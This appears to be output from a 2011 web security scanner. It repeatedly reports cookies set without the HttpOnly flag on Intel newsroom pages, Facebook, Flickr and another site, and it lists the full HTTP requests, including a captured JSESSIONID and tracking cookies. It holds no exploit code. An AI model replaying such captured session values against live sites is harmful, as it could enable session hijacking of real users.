INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/DOC-1405 HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/DOC-1406 HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/DOC-1502 HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/DOC-1512 HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/DOC-1641 HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/DOC-1801 HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /people/KrystalTemple HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /people/cldotts HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /people/pdarling HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /people/suzyintel HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: objectivemarketer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:09 GMT Server: Apache X-Powered-By: PHP/5.2.16 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: User-Agent,Accept,Accept-Encoding Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/ Set-Cookie: ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/ Last-Modified: Sat, 05 Feb 2011 23:21:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss/intel-master-pressfeed.xml HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=PvG3c; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Intel HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:09 GMT Content-Length: 43972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:08 GMT Content-Length: 10821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /apps/slideshow/show.swf HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
